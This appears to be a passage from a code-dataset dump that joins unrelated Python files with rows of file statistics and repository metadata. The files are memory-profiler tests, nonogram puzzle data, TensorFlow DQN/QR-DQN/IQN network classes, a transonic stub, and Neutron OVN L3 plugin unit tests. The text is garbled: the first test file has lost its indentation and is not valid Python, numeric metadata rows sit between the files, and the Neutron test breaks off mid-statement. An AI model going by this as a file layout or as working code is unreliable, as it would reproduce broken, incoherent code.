state, params = _get_state_from_pipe_command('ECHO')
assert_that(state, equal_to(MemoryProfilerState.ECHO))
assert_that(params, equal_to(None))
state, params = _get_state_from_pipe_command('Echo')
assert_that(state, equal_to(MemoryProfilerState.ECHO))
assert_that(params, equal_to(None))
def test__get_state_from_pipe_command_pympler(self):
        # no additional parameters
state, params = _get_state_from_pipe_command('pympler')
assert_that(state, equal_to(MemoryProfilerState.UNKNOWN))
assert_that(params, equal_to(None))
state, params = _get_state_from_pipe_command('pympler some_controller.someendpoint on')
assert_that(state, equal_to(MemoryProfilerState.PYMPLER))
assert_that(params, equal_to({'endpoint': 'some_controller.someendpoint', 'persistence': 'on'}))
state, params = _get_state_from_pipe_command('pympler some_controller.someendpoint once')
assert_that(state, equal_to(MemoryProfilerState.PYMPLER))
assert_that(params, equal_to({'endpoint': 'some_controller.someendpoint', 'persistence': 'once'}))
state, params = _get_state_from_pipe_command('pympler some_controller.someendpoint off')
assert_that(state, equal_to(MemoryProfilerState.PYMPLER))
assert_that(params, equal_to({'endpoint': 'some_controller.someendpoint', 'persistence': 'off'}))
state, params = _get_state_from_pipe_command('pympler some_controller.someendpoint nonsense')
assert_that(state, equal_to(MemoryProfilerState.UNKNOWN))
assert_that(params, equal_to(None))
def test_toggle_memory_profile_via_fifo_on(self):
thread_logger = MagicMock(info=MagicMock())
config_fifo = MagicMock(readline=MagicMock(return_value='ON\n'))
_process_fifo_input(thread_logger, config_fifo)
assert_that(get_memory_profile_logging_on(), equal_to(True))
def test_toggle_memory_profile_via_fifo_off(self):
thread_logger = MagicMock(info=MagicMock())
config_fifo = MagicMock(readline=MagicMock(return_value='OFF\n'))
_process_fifo_input(thread_logger, config_fifo)
assert_that(get_memory_profile_logging_on(), equal_to(False))
def test_toggle_memory_profile_via_fifo_pympler_add_enpoint_once(self):
thread_logger = MagicMock(info=MagicMock())
endpoint_path = 'magic_controller.end_point'
config_fifo = MagicMock(readline=MagicMock(return_value='ON\n'))
_process_fifo_input(thread_logger, config_fifo)
config_fifo = MagicMock(readline=MagicMock(return_value='pympler {} ONCE\n'.format(endpoint_path)))
_process_fifo_input(thread_logger, config_fifo)
assert_that(get_memory_profile_logging_on(), equal_to(True))
assert_that(_is_pympler_profiling_value_on(endpoint_path), equal_to(True))
def test_pympler_profiling_value_management(self):
_set_pympler_profiling_value('test1', 'on')
_set_pympler_profiling_value('test2', 'ON')
_set_pympler_profiling_value('test3', 'On')
_set_pympler_profiling_value('test4', 'ONCE')
_set_pympler_profiling_value('test5', 'once')
_set_pympler_profiling_value('test6', 'once')
        # can get more than once
assert_that(_is_pympler_profiling_value_on('test1'), equal_to(True))
assert_that(_is_pympler_profiling_value_on('test1'), equal_to(True))
# can turn off
assert_that(_is_pympler_profiling_value_on('test2'), equal_to(True))
_set_pympler_profiling_value('test2', 'off')
assert_that(_is_pympler_profiling_value_on('test2'), equal_to(False))
# can read capitalized
assert_that(_is_pympler_profiling_value_on('test3'), equal_to(True))
# can read only once
assert_that(_is_pympler_profiling_value_on('test4'), equal_to(True))
assert_that(_is_pympler_profiling_value_on('test4'), equal_to(False))
# can read lower case
assert_that(_is_pympler_profiling_value_on('test5'), equal_to(True))
# can turn off a one time execution profiler
_set_pympler_profiling_value('test6', 'off')
assert_that(_is_pympler_profiling_value_on('test6'), equal_to(False))
| 53.043103 | 118 | 0.737039 | 783 | 6,153 | 5.302682 | 0.114943 | 0.105973 | 0.060694 | 0.080925 | 0.864403 | 0.782274 | 0.762524 | 0.703757 | 0.670761 | 0.670761 | 0 | 0.003317 | 0.167073 | 6,153 | 115 | 119 | 53.504348 | 0.806829 | 0.026491 | 0 | 0.430108 | 0 | 0 | 0.087444 | 0.037118 | 0 | 0 | 0 | 0 | 0.473118 | 1 | 0.096774 | false | 0 | 0.043011 | 0 | 0.150538 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6af1b72d366ebdf693f2b6c9861bf6b4a0aac8e1 | 1,528 | py | Python | google_or_tools/nonogram_pbn_bucks.py | Wikunia/hakank | 030bc928d2efe8dcbc5118bda3f8ae9575d0fd13 | [
"MIT"
] | 279 | 2015-01-10T09:55:35.000Z | 2022-03-28T02:34:03.000Z | google_or_tools/nonogram_pbn_bucks.py | Wikunia/hakank | 030bc928d2efe8dcbc5118bda3f8ae9575d0fd13 | [
"MIT"
] | 10 | 2017-10-05T15:48:50.000Z | 2021-09-20T12:06:52.000Z | google_or_tools/nonogram_pbn_bucks.py | Wikunia/hakank | 030bc928d2efe8dcbc5118bda3f8ae9575d0fd13 | [
"MIT"
] | 83 | 2015-01-20T03:44:00.000Z | 2022-03-13T23:53:06.000Z | # webpbn.com Puzzle #27: Party at the Right [Political]
# Copyright 2004 by Jan Wolter
#
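# Each clue list below is left-padded with zeros to a fixed width
# (row_rule_len / col_rule_len) so the rule matrices stay rectangular.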
rows = 23
row_rule_len = 8
row_rules = [
[0, 0, 0, 0, 0, 0, 0, 11],
[0, 0, 0, 0, 0, 0, 0, 17],
[0, 0, 0, 0, 3, 5, 5, 3],
[0, 0, 0, 0, 2, 2, 2, 1],
[0, 2, 1, 3, 1, 3, 1, 4],
[0, 0, 0, 0, 3, 3, 3, 3],
[0, 5, 1, 3, 1, 3, 1, 3],
[0, 0, 0, 0, 3, 2, 2, 4],
[0, 0, 0, 0, 5, 5, 5, 5],
[0, 0, 0, 0, 0, 0, 0, 23],
[0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 23],
[0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 1, 2, 1],
[0, 0, 0, 0, 1, 1, 1, 1],
[0, 0, 0, 0, 1, 1, 1, 1],
[0, 0, 0, 1, 10, 1, 2, 1],
[0, 1, 1, 1, 1, 1, 1, 3],
[1, 1, 1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 1, 1, 1, 1, 2, 2],
[0, 0, 0, 0, 0, 5, 5, 3]
]
cols = 27
col_rule_len = 6
col_rules = [
[0, 0, 0, 0, 4, 12],
[0, 0, 0, 6, 1, 1],
[0, 0, 0, 8, 1, 1],
[0, 3, 2, 2, 1, 1],
[2, 1, 1, 2, 1, 6],
[0, 0, 1, 1, 1, 1],
[3, 1, 1, 2, 1, 1],
[0, 3, 2, 3, 1, 1],
[0, 0, 0, 10, 1, 1],
[0, 4, 2, 2, 1, 1],
[3, 1, 1, 2, 1, 1],
[0, 0, 2, 1, 1, 1],
[3, 1, 1, 2, 1, 1],
[0, 3, 2, 3, 1, 6],
[0, 0, 0, 10, 1, 1],
[0, 4, 2, 2, 1, 1],
[3, 1, 1, 2, 1, 1],
[0, 0, 1, 1, 1, 9],
[2, 1, 1, 2, 1, 1],
[0, 2, 2, 3, 1, 3],
[0, 0, 0, 8, 1, 5],
[0, 0, 0, 6, 1, 1],
[0, 0, 0, 4, 9, 1],
[0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 2, 1],
[0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 4]
]
| 24.253968 | 55 | 0.310864 | 376 | 1,528 | 1.24734 | 0.093085 | 0.45629 | 0.479744 | 0.400853 | 0.692964 | 0.573561 | 0.486141 | 0.434968 | 0.379531 | 0.341151 | 0 | 0.390608 | 0.38678 | 1,528 | 62 | 56 | 24.645161 | 0.109925 | 0.05301 | 0 | 0.310345 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ed2b21fd06ec0808da42e448a2911351887fe8ed | 5,591 | py | Python | example_model/value/cnn/discrete.py | SunandBean/tensorflow_RL | a248cbfb99b2041f6f7cc008fcad53fb83ac486e | [
"MIT"
] | 60 | 2019-01-29T14:13:00.000Z | 2020-11-24T09:08:05.000Z | example_model/value/cnn/discrete.py | SunandBean/tensorflow_RL | a248cbfb99b2041f6f7cc008fcad53fb83ac486e | [
"MIT"
] | 2 | 2019-08-14T06:44:32.000Z | 2020-11-12T12:57:55.000Z | example_model/value/cnn/discrete.py | SunandBean/tensorflow_RL | a248cbfb99b2041f6f7cc008fcad53fb83ac486e | [
"MIT"
] | 37 | 2019-01-22T05:19:34.000Z | 2021-04-12T02:27:50.000Z | import tensorflow as tf
import numpy as np
class CNNQRDQN:
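    """Quantile Regression DQN head: a CNN torso followed by dense layers that
    emit `num_support` quantile estimates for every action."""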
def __init__(self, name, window_size, obs_stack, output_size, num_support):
self.window_size = window_size
self.obs_stack = obs_stack
self.output_size = output_size
self.num_support = num_support
with tf.variable_scope(name):
self.input = tf.placeholder(tf.float32, shape=[None, self.window_size, self.window_size, self.obs_stack])
self.conv1 = tf.layers.conv2d(inputs=self.input, filters=32, kernel_size=[8, 8], strides=[4, 4], padding='VALID', activation=tf.nn.relu)
self.conv2 = tf.layers.conv2d(inputs=self.conv1, filters=64, kernel_size=[4, 4], strides=[2, 2], padding='VALID', activation=tf.nn.relu)
self.conv3 = tf.layers.conv2d(inputs=self.conv2, filters=64, kernel_size=[3, 3], strides=[1, 1], padding='VALID', activation=tf.nn.relu)
self.reshape = tf.reshape(self.conv3, [-1, 7 * 7 * 64])
self.l1 = tf.layers.dense(inputs=self.reshape, units=512, activation=tf.nn.relu)
self.l2 = tf.layers.dense(inputs=self.l1, units=self.output_size * self.num_support, activation=None)
self.net = tf.reshape(self.l2, [-1, self.output_size, self.num_support])
self.scope = tf.get_variable_scope().name
def get_variables(self):
return tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, self.scope)
def get_trainable_variables(self):
return tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, self.scope)
class CNNIQN:
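    """Implicit Quantile Network head: the state embedding is tiled once per
    sampled quantile fraction tau and combined multiplicatively with a cosine
    embedding of tau before the final action-value layers."""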
def __init__(self, name, window_size, obs_stack, output_size, num_support, batch_size):
self.window_size = window_size
self.obs_stack = obs_stack
self.output_size = output_size
self.num_support = num_support
self.batch_size = batch_size
self.quantile_embedding_dim = 128
with tf.variable_scope(name):
self.input = tf.placeholder(tf.float32, shape=[None, self.window_size, self.window_size, self.obs_stack])
self.input_expand = tf.expand_dims(self.input, axis=1)
self.input_tile = tf.tile(self.input_expand, [1, self.num_support, 1, 1, 1])
self.input_reshape = tf.reshape(self.input_tile, [-1, self.window_size, self.window_size, self.obs_stack])
self.conv1 = tf.layers.conv2d(inputs=self.input_reshape, filters=32, kernel_size=[8, 8], strides=[4, 4], padding='VALID', activation=tf.nn.relu)
self.conv2 = tf.layers.conv2d(inputs=self.conv1, filters=64, kernel_size=[4, 4], strides=[2, 2], padding='VALID', activation=tf.nn.relu)
self.conv3 = tf.layers.conv2d(inputs=self.conv2, filters=64, kernel_size=[3, 3], strides=[1, 1], padding='VALID', activation=tf.nn.relu)
self.reshape = tf.reshape(self.conv3, [-1, 7 * 7 * 64])
self.l1 = tf.layers.dense(inputs=self.reshape, units=self.quantile_embedding_dim, activation=tf.nn.relu)
self.tau = tf.placeholder(tf.float32, [None, self.num_support])
self.tau_reshape = tf.reshape(self.tau, [-1, 1])
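            # Cosine embedding of tau: phi(tau) = ReLU(W.cos(pi * i * tau) + b), i = 0..63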
self.pi_mtx = tf.constant(np.expand_dims(np.pi * np.arange(0, 64), axis=0), dtype=tf.float32)
self.cos_tau = tf.cos(tf.matmul(self.tau_reshape, self.pi_mtx))
self.phi = tf.layers.dense(inputs=self.cos_tau, units=self.quantile_embedding_dim, activation=tf.nn.relu)
self.net_sum = tf.multiply(self.l1, self.phi)
self.net_l1 = tf.layers.dense(inputs=self.net_sum, units=512, activation=tf.nn.relu)
self.net_l2 = tf.layers.dense(inputs=self.net_l1, units=256, activation=tf.nn.relu)
self.net_l3 = tf.layers.dense(inputs=self.net_l2, units=self.output_size, activation=None)
self.net_action = tf.transpose(tf.split(self.net_l3, 1, axis=0), perm=[0, 2, 1])
self.net = tf.transpose(tf.split(self.net_l3, self.batch_size, axis=0), perm=[0, 2, 1])
self.scope = tf.get_variable_scope().name
def get_variables(self):
return tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, self.scope)
def get_trainable_variables(self):
return tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, self.scope)
class CNNDQN:
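    """Standard DQN head: CNN torso plus dense layers giving one Q-value per action."""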
def __init__(self, name, window_size, obs_stack, output_size):
self.window_size = window_size
self.obs_stack = obs_stack
self.output_size = output_size
with tf.variable_scope(name):
self.input = tf.placeholder(tf.float32, shape=[None, self.window_size, self.window_size, self.obs_stack])
self.conv1 = tf.layers.conv2d(inputs=self.input, filters=32, kernel_size=[8, 8], strides=[4, 4], padding='VALID', activation=tf.nn.relu)
self.conv2 = tf.layers.conv2d(inputs=self.conv1, filters=64, kernel_size=[4, 4], strides=[2, 2], padding='VALID', activation=tf.nn.relu)
self.conv3 = tf.layers.conv2d(inputs=self.conv2, filters=64, kernel_size=[3, 3], strides=[1, 1], padding='VALID', activation=tf.nn.relu)
self.reshape = tf.reshape(self.conv3, [-1, 7 * 7 * 64])
self.dense_3 = tf.layers.dense(inputs=self.reshape, units=512, activation=tf.nn.relu)
self.Q = tf.layers.dense(inputs=self.dense_3, units=self.output_size, activation=None)
self.scope = tf.get_variable_scope().name
def get_variables(self):
return tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, self.scope)
def get_trainable_variables(self):
return tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, self.scope)
| 61.43956 | 156 | 0.66929 | 822 | 5,591 | 4.381995 | 0.113139 | 0.039978 | 0.058301 | 0.074958 | 0.838701 | 0.82593 | 0.772071 | 0.721544 | 0.721544 | 0.721544 | 0 | 0.035111 | 0.195135 | 5,591 | 90 | 157 | 62.122222 | 0.765333 | 0 | 0 | 0.581081 | 0 | 0 | 0.008049 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.121622 | false | 0 | 0.027027 | 0.081081 | 0.27027 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ed4cf79b68807c6e6f762cc39a4b1615dc109854 | 82 | py | Python | data_tests/saved__backend__py3.9/pythran/no_arg.py | fluiddyn/transonic | a460e9f6d1139f79b668cb3306d1e8a7e190b72d | [
"BSD-3-Clause"
] | 88 | 2019-01-08T16:39:08.000Z | 2022-02-06T14:19:23.000Z | data_tests/saved__backend__/pythran/no_arg.py | fluiddyn/transonic | a460e9f6d1139f79b668cb3306d1e8a7e190b72d | [
"BSD-3-Clause"
] | 13 | 2019-06-20T15:53:10.000Z | 2021-02-09T11:03:29.000Z | data_tests/saved__backend__/pythran/no_arg.py | fluiddyn/transonic | a460e9f6d1139f79b668cb3306d1e8a7e190b72d | [
"BSD-3-Clause"
] | 1 | 2019-11-05T03:03:14.000Z | 2019-11-05T03:03:14.000Z | def func():
return 1
def func2():
return 1
__transonic__ = ("0.3.0",)
| 8.2 | 26 | 0.54878 | 12 | 82 | 3.416667 | 0.666667 | 0.341463 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.101695 | 0.280488 | 82 | 9 | 27 | 9.111111 | 0.59322 | 0 | 0 | 0.4 | 0 | 0 | 0.060976 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0 | 0.4 | 0.8 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
ed5030f823aceb7a09b2a0cb64a3f23db44d69e7 | 83,760 | py | Python | neutron/tests/unit/services/ovn_l3/test_plugin.py | huiweics/neutron | 8c7ca776d8cbe967a8bbe773ab38c361414a7068 | [
"Apache-2.0"
] | null | null | null | neutron/tests/unit/services/ovn_l3/test_plugin.py | huiweics/neutron | 8c7ca776d8cbe967a8bbe773ab38c361414a7068 | [
"Apache-2.0"
] | null | null | null | neutron/tests/unit/services/ovn_l3/test_plugin.py | huiweics/neutron | 8c7ca776d8cbe967a8bbe773ab38c361414a7068 | [
"Apache-2.0"
] | null | null | null | #
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import copy
import mock
from neutron_lib.api.definitions import external_net
from neutron_lib.api.definitions import portbindings
from neutron_lib.api.definitions import provider_net as pnet
from neutron_lib.callbacks import events
from neutron_lib.callbacks import resources
from neutron_lib import constants
from neutron_lib import exceptions as n_exc
from neutron_lib.plugins import constants as plugin_constants
from neutron_lib.plugins import directory
from oslo_config import cfg
from oslo_utils import uuidutils
from neutron.common.ovn import constants as ovn_const
from neutron.common.ovn import utils
from neutron.conf.plugins.ml2.drivers.ovn import ovn_conf as config
from neutron.services.revisions import revision_plugin
from neutron.tests.unit.api import test_extensions
from neutron.tests.unit.extensions import test_extraroute
from neutron.tests.unit.extensions import test_l3
from neutron.tests.unit.extensions import test_l3_ext_gw_mode as test_l3_gw
from neutron.tests.unit import fake_resources
from neutron.tests.unit.plugins.ml2 import test_plugin as test_mech_driver
# TODO(mjozefcz): Find out a way to not inherit from
# Ml2PluginV2TestCase.
class TestOVNL3RouterPlugin(test_mech_driver.Ml2PluginV2TestCase):
l3_plugin = 'neutron.services.ovn_l3.plugin.OVNL3RouterPlugin'
def _start_mock(self, path, return_value, new_callable=None):
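        """Start a mock.patch on ``path``, register its cleanup and return it."""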
patcher = mock.patch(path, return_value=return_value,
new_callable=new_callable)
patch = patcher.start()
self.addCleanup(patcher.stop)
return patch
def setUp(self):
super(TestOVNL3RouterPlugin, self).setUp()
revision_plugin.RevisionPlugin()
network_attrs = {external_net.EXTERNAL: True, 'mtu': 1500}
self.fake_network = \
fake_resources.FakeNetwork.create_one_network(
attrs=network_attrs).info()
self.fake_router_port = {'device_id': '',
'network_id': self.fake_network['id'],
'device_owner': 'network:router_interface',
'mac_address': 'aa:aa:aa:aa:aa:aa',
'status': constants.PORT_STATUS_ACTIVE,
'fixed_ips': [{'ip_address': '10.0.0.100',
'subnet_id': 'subnet-id'}],
'id': 'router-port-id'}
self.fake_router_port_assert = {
'lrouter': 'neutron-router-id',
'mac': 'aa:aa:aa:aa:aa:aa',
'name': 'lrp-router-port-id',
'may_exist': True,
'networks': ['10.0.0.100/24'],
'options': {},
'external_ids': {
ovn_const.OVN_SUBNET_EXT_IDS_KEY: 'subnet-id',
ovn_const.OVN_REV_NUM_EXT_ID_KEY: '1',
ovn_const.OVN_NETWORK_NAME_EXT_ID_KEY:
utils.ovn_name(self.fake_network['id'])}}
self.fake_router_ports = [self.fake_router_port]
self.fake_subnet = {'id': 'subnet-id',
'ip_version': 4,
'cidr': '10.0.0.0/24'}
self.fake_router = {'id': 'router-id',
'name': 'router',
'admin_state_up': False,
'routes': [{'destination': '1.1.1.0/24',
'nexthop': '10.0.0.2'}]}
self.fake_router_interface_info = {
'port_id': 'router-port-id',
'device_id': '',
'mac_address': 'aa:aa:aa:aa:aa:aa',
'subnet_id': 'subnet-id',
'subnet_ids': ['subnet-id'],
'fixed_ips': [{'ip_address': '10.0.0.100',
'subnet_id': 'subnet-id'}],
'id': 'router-port-id'}
self.fake_external_fixed_ips = {
'network_id': 'ext-network-id',
'external_fixed_ips': [{'ip_address': '192.168.1.1',
'subnet_id': 'ext-subnet-id'}]}
self.fake_router_with_ext_gw = {
'id': 'router-id',
'name': 'router',
'admin_state_up': True,
'external_gateway_info': self.fake_external_fixed_ips,
'gw_port_id': 'gw-port-id'
}
self.fake_router_without_ext_gw = {
'id': 'router-id',
'name': 'router',
'admin_state_up': True,
}
self.fake_ext_subnet = {'id': 'ext-subnet-id',
'ip_version': 4,
'cidr': '192.168.1.0/24',
'gateway_ip': '192.168.1.254'}
self.fake_ext_gw_port = {'device_id': '',
'device_owner': 'network:router_gateway',
'fixed_ips': [{'ip_address': '192.168.1.1',
'subnet_id': 'ext-subnet-id'}],
'mac_address': '00:00:00:02:04:06',
'network_id': self.fake_network['id'],
'id': 'gw-port-id'}
self.fake_ext_gw_port_assert = {
'lrouter': 'neutron-router-id',
'mac': '00:00:00:02:04:06',
'name': 'lrp-gw-port-id',
'networks': ['192.168.1.1/24'],
'may_exist': True,
'external_ids': {
ovn_const.OVN_SUBNET_EXT_IDS_KEY: 'ext-subnet-id',
ovn_const.OVN_REV_NUM_EXT_ID_KEY: '1',
ovn_const.OVN_NETWORK_NAME_EXT_ID_KEY:
utils.ovn_name(self.fake_network['id'])},
'gateway_chassis': ['hv1'],
'options': {}}
self.fake_floating_ip_attrs = {'floating_ip_address': '192.168.0.10',
'fixed_ip_address': '10.0.0.10'}
self.fake_floating_ip = fake_resources.FakeFloatingIp.create_one_fip(
attrs=self.fake_floating_ip_attrs)
self.fake_floating_ip_new_attrs = {
'router_id': 'new-router-id',
'floating_ip_address': '192.168.0.10',
'fixed_ip_address': '10.10.10.10',
'port_id': 'new-port_id'}
self.fake_floating_ip_new = (
fake_resources.FakeFloatingIp.create_one_fip(
attrs=self.fake_floating_ip_new_attrs))
self.fake_ovn_nat_rule = (
fake_resources.FakeOvsdbRow.create_one_ovsdb_row({
'logical_ip': self.fake_floating_ip['fixed_ip_address'],
'external_ip': self.fake_floating_ip['floating_ip_address'],
'type': 'dnat_and_snat',
'external_ids': {
ovn_const.OVN_FIP_EXT_ID_KEY: self.fake_floating_ip['id'],
ovn_const.OVN_FIP_PORT_EXT_ID_KEY:
self.fake_floating_ip['port_id'],
ovn_const.OVN_ROUTER_NAME_EXT_ID_KEY: utils.ovn_name(
self.fake_floating_ip['router_id'])}}))
self.l3_inst = directory.get_plugin(plugin_constants.L3)
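        # Fixtures for the OVN load balancer scenarios exercised by the
        # FIP <-> LB member/VIP tests below.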
self.lb_id = uuidutils.generate_uuid()
self.member_subnet = {'id': 'subnet-id',
'ip_version': 4,
'cidr': '10.0.0.0/24',
'network_id': self.fake_network['id']}
self.member_id = uuidutils.generate_uuid()
self.member_port_id = uuidutils.generate_uuid()
self.member_address = '10.0.0.10'
self.member_l4_port = '80'
self.member_port = {
'network_id': self.fake_network['id'],
'mac_address': 'aa:aa:aa:aa:aa:aa',
'fixed_ips': [{'ip_address': self.member_address,
'subnet_id': self.member_subnet['id']}],
'id': 'fake-port-id'}
self.member_lsp = fake_resources.FakeOvsdbRow.create_one_ovsdb_row(
attrs={
'addresses': ['10.0.0.10 ff:ff:ff:ff:ff:ff'],
'uuid': self.member_port['id']})
self.listener_id = uuidutils.generate_uuid()
self.pool_id = uuidutils.generate_uuid()
self.ovn_lb = mock.MagicMock()
self.ovn_lb.protocol = ['tcp']
self.ovn_lb.uuid = uuidutils.generate_uuid()
self.member_line = (
'member_%s_%s:%s_%s' %
(self.member_id, self.member_address,
self.member_l4_port, self.member_subnet['id']))
self.ovn_lb.external_ids = {
ovn_const.LB_EXT_IDS_VIP_KEY: '10.22.33.4',
ovn_const.LB_EXT_IDS_VIP_FIP_KEY: '123.123.123.123',
ovn_const.LB_EXT_IDS_VIP_PORT_ID_KEY: 'foo_port',
'enabled': True,
'pool_%s' % self.pool_id: self.member_line,
'listener_%s' % self.listener_id: '80:pool_%s' % self.pool_id}
self.lb_vip_lsp = fake_resources.FakeOvsdbRow.create_one_ovsdb_row(
attrs={'external_ids': {ovn_const.OVN_PORT_NAME_EXT_ID_KEY:
'%s%s' % (ovn_const.LB_VIP_PORT_PREFIX,
self.ovn_lb.uuid)},
'name': uuidutils.generate_uuid(),
'addresses': ['10.0.0.100 ff:ff:ff:ff:ff:ee'],
'uuid': uuidutils.generate_uuid()})
self.lb_network = fake_resources.FakeOvsdbRow.create_one_ovsdb_row(
attrs={'load_balancer': [self.ovn_lb],
'name': 'neutron-%s' % self.fake_network['id'],
'ports': [self.lb_vip_lsp, self.member_lsp],
'uuid': self.fake_network['id']})
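        # Replace the OVN NB/SB IDLs and the Neutron DB accessors with
        # mocks so the tests only talk to fake OVSDB objects.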
self.nb_idl = self._start_mock(
'neutron.services.ovn_l3.plugin.OVNL3RouterPlugin._ovn',
new_callable=mock.PropertyMock,
return_value=fake_resources.FakeOvsdbNbOvnIdl())
self.sb_idl = self._start_mock(
'neutron.services.ovn_l3.plugin.OVNL3RouterPlugin._sb_ovn',
new_callable=mock.PropertyMock,
return_value=fake_resources.FakeOvsdbSbOvnIdl())
self._start_mock(
'neutron.plugins.ml2.plugin.Ml2Plugin.get_network',
return_value=self.fake_network)
self._start_mock(
'neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_port',
return_value=self.fake_router_port)
self._start_mock(
'neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_subnet',
return_value=self.fake_subnet)
self._start_mock(
'neutron.db.l3_db.L3_NAT_dbonly_mixin.get_router',
return_value=self.fake_router)
self._start_mock(
'neutron.db.extraroute_db.ExtraRoute_dbonly_mixin.update_router',
return_value=self.fake_router)
self._start_mock(
'neutron.db.l3_db.L3_NAT_dbonly_mixin.remove_router_interface',
return_value=self.fake_router_interface_info)
self._start_mock(
'neutron.db.l3_db.L3_NAT_dbonly_mixin.create_router',
return_value=self.fake_router_with_ext_gw)
self._start_mock(
'neutron.db.l3_db.L3_NAT_dbonly_mixin.delete_router',
return_value={})
self.mock_candidates = self._start_mock(
'neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.ovn_client.'
'OVNClient.get_candidates_for_scheduling',
return_value=[])
self.mock_schedule = self._start_mock(
'neutron.scheduler.l3_ovn_scheduler.'
'OVNGatewayLeastLoadedScheduler._schedule_gateway',
return_value=['hv1'])
        # FIXME(lucasagomes): We shouldn't be mocking the creation of
        # floating IPs here; that prevents the FIP from being registered
        # in the standardattributes table, which is why we also need to
        # mock bump_revision.
self._start_mock(
'neutron.db.l3_db.L3_NAT_dbonly_mixin.create_floatingip',
return_value=self.fake_floating_ip)
self._start_mock(
'neutron.db.l3_db.L3_NAT_dbonly_mixin._get_floatingip',
return_value=self.fake_floating_ip)
self._start_mock(
'neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.ovn_client.'
'OVNClient.update_floatingip_status',
return_value=None)
self.bump_rev_p = self._start_mock(
'neutron.db.ovn_revision_numbers_db.bump_revision',
return_value=None)
self.del_rev_p = self._start_mock(
'neutron.db.ovn_revision_numbers_db.delete_revision',
return_value=None)
self.get_rev_p = self._start_mock(
'neutron.common.ovn.utils.get_revision_number',
return_value=1)
self.admin_context = mock.Mock()
self.get_a_ctx_mock_p = mock.patch(
'neutron_lib.context.get_admin_context',
return_value=self.admin_context)
self.addCleanup(self.get_a_ctx_mock_p.stop)
self.get_a_ctx_mock_p.start()
self.mock_is_lb_member_fip = mock.patch(
'neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.ovn_client'
'.OVNClient._is_lb_member_fip',
return_value=False)
self.mock_is_lb_member_fip.start()
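    # Adding a router interface should create the OVN logical router
    # port, wire it into the logical switch port and bump the revision
    # number of the Neutron router port.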
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.add_router_interface')
def test_add_router_interface(self, func):
router_id = 'router-id'
interface_info = {'port_id': 'router-port-id'}
func.return_value = self.fake_router_interface_info
self.l3_inst.add_router_interface(self.context, router_id,
interface_info)
self.l3_inst._ovn.add_lrouter_port.assert_called_once_with(
**self.fake_router_port_assert)
self.l3_inst._ovn.set_lrouter_port_in_lswitch_port.\
assert_called_once_with(
'router-port-id', 'lrp-router-port-id', is_gw_port=False,
lsp_address=ovn_const.DEFAULT_ADDR_FOR_LSP_WITH_PEER)
self.bump_rev_p.assert_called_once_with(
self.admin_context, self.fake_router_port,
ovn_const.TYPE_ROUTER_PORTS)
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.add_router_interface')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_port')
def test_add_router_interface_update_lrouter_port(self, getp, func):
router_id = 'router-id'
interface_info = {'port_id': 'router-port-id'}
func.return_value = {'id': router_id,
'port_id': 'router-port-id',
'subnet_id': 'subnet-id1',
'subnet_ids': ['subnet-id1'],
'fixed_ips': [
{'ip_address': '2001:db8::1',
'subnet_id': 'subnet-id1'},
{'ip_address': '2001:dba::1',
'subnet_id': 'subnet-id2'}],
'mac_address': 'aa:aa:aa:aa:aa:aa'
}
getp.return_value = {
'id': 'router-port-id',
'fixed_ips': [
{'ip_address': '2001:db8::1', 'subnet_id': 'subnet-id1'},
{'ip_address': '2001:dba::1', 'subnet_id': 'subnet-id2'}],
